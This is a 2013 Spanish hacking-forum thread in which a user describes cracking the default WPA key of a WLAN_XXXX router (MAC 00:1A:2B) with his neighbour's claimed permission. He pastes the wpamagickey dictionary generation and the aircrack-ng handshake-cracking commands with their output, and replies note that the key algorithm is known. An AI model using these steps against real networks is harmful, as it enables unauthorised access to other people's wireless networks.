elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux
| | | |-+  WLAN_XXXX 00:1A:2B Juakeada con permiso,diccionario y handshake..
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: WLAN_XXXX 00:1A:2B Juakeada con permiso,diccionario y handshake..  (Leído 29,575 veces)
HalconEye

Desconectado Desconectado

Mensajes: 154


Ver Perfil
WLAN_XXXX 00:1A:2B Juakeada con permiso,diccionario y handshake..
« en: 9 Febrero 2013, 18:22 pm »

Saludos a la comunidad.
Esta tarde me dió por probar unas cuantas cosillas...
la primera un capturador de handshake que viene en la distro WIFISLAX 4.3 Final(no recuerdo el nombre,pero sólo tiene uno)....una vez obtenido el paquete,reinicio y continúo con xubuntu...
la segunda...me descargo e instalo wpamagickey,una vez hecho,genero un diccionario para una WLAN_XYYX con mac 00:1A:2B...al cual le llamo dicc a secas.(X es Nº e Y LETRA)
Y ya por último,abro consola y le paso el diccionario al handshake con aircrack-ng  y BINGO...me da la wpa....y encima la CORRECTA...
Me explico...después de probar todos y cada uno de los programas que generaban una posible clave por defecto,NI UNO SOLO me dió la wpa correcta...y así durante meses...hasta hoy.
Reconozco que he tenido una suerte INCREÍBLE al estar la pass en el diccionario....no me ha dado tiempo ni a pestañear...apenas 1 sg XD :o

Os pongo un copy-paste del proceso por consola:

wpakill@MMXIII:~$ sudo wpamagickey  WLAN_XYYX 00:1A:2B:XX:XX:XX dicc



Essid: WLAN_XYYX - Bssid: 00:1A:2B:XX:XX:XX

  • Generando fichero de claves: dicc

 Calculadas 512 claves (10.8 kB)                                

  • Fichero guardado OK                        

wpakill@MMXIII:~$ sudo aircrack-ng -w /home/wpakill/Escritorio/dicc /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
[sudo] password for wpakill:
Opening /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
Read 13050 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1A:2B:XX:XX:XX  WLAN_XYYX                 WPA (1 handshake)

Choosing first network as target.

Opening /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r2230


                   [00:00:01] 232 keys tested (149.21 k/s)


                     KEY FOUND! [ 20 letras y números ]


      Master Key     : 37 EB 8E 74 4F AB CD C0 E8 2D E9 DB 37 3D C3 80
                       edito toda la línea

      Transient Key  : 95 17 4A E6 F8 D4 F6 28 0E BB 2D 5A C3 8E 44 07
                       y 3 líneas mas

      EAPOL HMAC     : edito la línea
wpakill@MMXIII:~$


pd.NI QUÉ DECIR TIENE QUE ESTO PUEDO HACERLO CON EL PERMISO DE MI VECINO-COLEGA...obviamente la pass se la he cambiado yo mismo...una de las que pyrit tardaría 2 ó 3 años......luz :xD
« Última modificación: 26 Febrero 2013, 12:55 pm por malamadre67 » En línea

Todo lo que digan que somos,
lo somos y aún peor.
alister


Desconectado Desconectado

Mensajes: 513


Ver Perfil
Re: WLAN_XXXX 00:1A:2B Juakeada con diccionario y handshake
« Respuesta #1 en: 9 Febrero 2013, 18:29 pm »

no entiendo por qué dices que has tenido suerte, cuando wpamagickey esta pensado para darte la clave exacta ("provided the fact" que esté por defecto).

ademas las 00:1A:2B son viejas conocidas con dificultad cero.

PD: puedes usar airodump capturar el handshake. no hay nada mas rapido. si estas dentro de airoscript todo el procedimiento que has descrito es cuestion de un par de minutos y sin reiniciar.
En línea

Back 2 business!
lekaja

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Re: WLAN_XXXX 00:1A:2B Juakeada con diccionario y handshake
« Respuesta #2 en: 9 Febrero 2013, 18:44 pm »

a lo mejor le daba un handsahke corrupto y por eso no le daba la clave  :silbar: y esta ves le dio la correcta y bingo  ;D
En línea

HalconEye

Desconectado Desconectado

Mensajes: 154


Ver Perfil
Re: WLAN_XXXX 00:1A:2B Juakeada con diccionario y handshake
« Respuesta #3 en: 9 Febrero 2013, 19:16 pm »

Ni airoscript,ni wifite,ni multiattack,ni siquiera el wlanmagickey me daban
 la pass correcta...me daba "posibles",pero ninguna valía...hasta que le pasé el diccionario a un handshake auténtico........como he dicho,llevaba meses probando todas esas herramientas automatizadas que de nada me han servido,hasta que me ha dado por la alternativa B.
Y digo lo de suerte,porque no me lo creía...hasta que lo he comprobado con la red en sí misma.

a lo mejor le daba un handsahke corrupto y por eso no le daba la clave  :silbar:

+1...a esa misma conclusión llegué y por eso me dió por hacerlo sobre un handshake real.

Conclusión...eso de la key por defecto....va a ser que no.Al menos con este router :laugh:
En línea

Todo lo que digan que somos,
lo somos y aún peor.
alister


Desconectado Desconectado

Mensajes: 513


Ver Perfil
Re: WLAN_XXXX 00:1A:2B Juakeada con diccionario y handshake
« Respuesta #4 en: 9 Febrero 2013, 20:13 pm »

Ni airoscript,ni wifite,ni multiattack,ni siquiera el wlanmagickey me daban
 la pass correcta...me daba "posibles",pero ninguna valía...hasta que le pasé el diccionario a un handshake auténtico........como he dicho,llevaba meses probando todas esas herramientas automatizadas que de nada me han servido,hasta que me ha dado por la alternativa B.
Y digo lo de suerte,porque no me lo creía...hasta que lo he comprobado con la red en sí misma.

+1...a esa misma conclusión llegué y por eso me dió por hacerlo sobre un handshake real.

Conclusión...eso de la key por defecto....va a ser que no.Al menos con este router :laugh:

pues no entiendo nada.

hace ya mucho tiempo que sabemos el algoritmo de password de las 00:1A:2B, y aunque no podemos dar la permutación correcta exacta, obtenemos un diccionario donde sí está la pass. insisto, suponiendo que era la pass por defecto.

ademas, si la contraseña eran 20 letras y numeros, es la contraseña por defecto. y si no fuera la pass por defecto, wpamagickey no te la habria dado, cosa que si ha hecho.
« Última modificación: 9 Febrero 2013, 20:14 pm por alist3r » En línea

Back 2 business!
El_Andaluz


Desconectado Desconectado

Mensajes: 3.415



Ver Perfil
Re: WLAN_XXXX 00:1A:2B Juakeada con diccionario y handshake
« Respuesta #5 en: 10 Febrero 2013, 01:52 am »

Pero no te creas que por que te haya sacado la clave con el WPAmagikey con esa WLAN_XXXX que ya se sabe el algoritmo te vaya a funcionar con mas WLAN_XXXX como algunas nuevas que han salido y que todavía estar por descubrirse el algoritmo,
de todas manera yo probare con mi WLAN_XXXX haber si por casualidad me da la clave. :)
En línea

alister


Desconectado Desconectado

Mensajes: 513


Ver Perfil
Re: WLAN_XXXX 00:1A:2B Juakeada con diccionario y handshake
« Respuesta #6 en: 10 Febrero 2013, 01:55 am »

Pero no te creas que por que te haya sacado la clave con el WPAmagikey con esa WLAN_XXXX que ya se sabe el algoritmo te vaya a funcionar con mas WLAN_XXXX como algunas nuevas que han salido y que todavía estar por descubrirse el algoritmo,
de todas manera yo probare con mi WLAN_XXXX haber si por casualidad me da la clave. :)

claro. depende de la mac. esto se ha dicho muchas veces.
pero en el caso particular de las 00:1A:2B... es de nivel "cerebro-no-requerido"
En línea

Back 2 business!
HalconEye

Desconectado Desconectado

Mensajes: 154


Ver Perfil
Re: WLAN_XXXX 00:1A:2B Juakeada con diccionario y handshake
« Respuesta #7 en: 10 Febrero 2013, 16:54 pm »

claro. depende de la mac. esto se ha dicho muchas veces.
pero en el caso particular de las 00:1A:2B... es de nivel "cerebro-no-requerido"

 ;D para eso precisamente se hacen las guis y similares...para no comerse el coco más que lo justo... ;-)
personalmente,la contraseña carece de importancia,existe un algoritmo y punto...lo que me interesaba era ver un handshake auténtico(o sea,que no me diese errores tipo se ha cortado inesperadamente la captura ó similar)...y poder generar el mío propio para "escanearlo" con detenimiento con las herramientas que hay....
así he podido,por ejemplo, ver lo que diría un  "indicio" de patrón en la wpa....
4 números 1 letra minúscula
4 números 1 letra minúscula
4 números 1 letra minúscula
4 números 1 letra minúscula

ahora lo que me interesa(si es que es posible) es utilizar esa aplicación de wifislax que SÍ me dió correcto el hs... pero en xubuntu...lo cual,por mi escaso conocimiento creo es incompatible,...aunque igual estoy equivocado y algún programador con ganas se enrolla y hace un módulo,o un tar.gz,o gui o lo-que -sea para que rule en xubuntu....
en fin....de nivel "no me pises que llevo chanclas"  :laugh: :xD
En línea

Todo lo que digan que somos,
lo somos y aún peor.
alister


Desconectado Desconectado

Mensajes: 513


Ver Perfil
Re: WLAN_XXXX 00:1A:2B Juakeada con diccionario y handshake
« Respuesta #8 en: 10 Febrero 2013, 17:03 pm »



que aplicacion?
« Última modificación: 11 Febrero 2013, 09:54 am por ChimoC » En línea

Back 2 business!
HalconEye

Desconectado Desconectado

Mensajes: 154


Ver Perfil
Re: WLAN_XXXX 00:1A:2B Juakeada con diccionario y handshake
« Respuesta #9 en: 10 Febrero 2013, 20:14 pm »

Se llama AUTOHANDSHAKEGUI-GUI 1.0 BETA 2 / SV2k10



Lo que me "escama" es que sí aparece como aplicación con Openbox y en cambio no aparece en Xfce

En línea

Todo lo que digan que somos,
lo somos y aún peor.
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
MOVIDO: DICCIONARIO PARA HANDSHAKE
Hacking Mobile
SirGraham 0 3,846 Último mensaje 20 Noviembre 2009, 13:55 pm
por SirGraham
diccionario wlan_xxxx
Wireless en Linux
hacju 7 10,677 Último mensaje 31 Diciembre 2010, 16:19 pm
por tamodo
Diccionario WPA para WLAN_XXXX
Hacking Wireless
OLM 8 33,688 Último mensaje 17 Abril 2012, 16:28 pm
por kupu88
Entre el handshake y diccionario.
Hacking Wireless
jemez44 6 4,059 Último mensaje 31 Marzo 2013, 19:48 pm
por siberwolf
Diccionario de 20 Dígitos Aleatorio para WLAN_XXXX « 1 2 3 »
Wireless en Linux
El_Andaluz 24 27,371 Último mensaje 3 Diciembre 2015, 21:08 pm
por robermgs
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines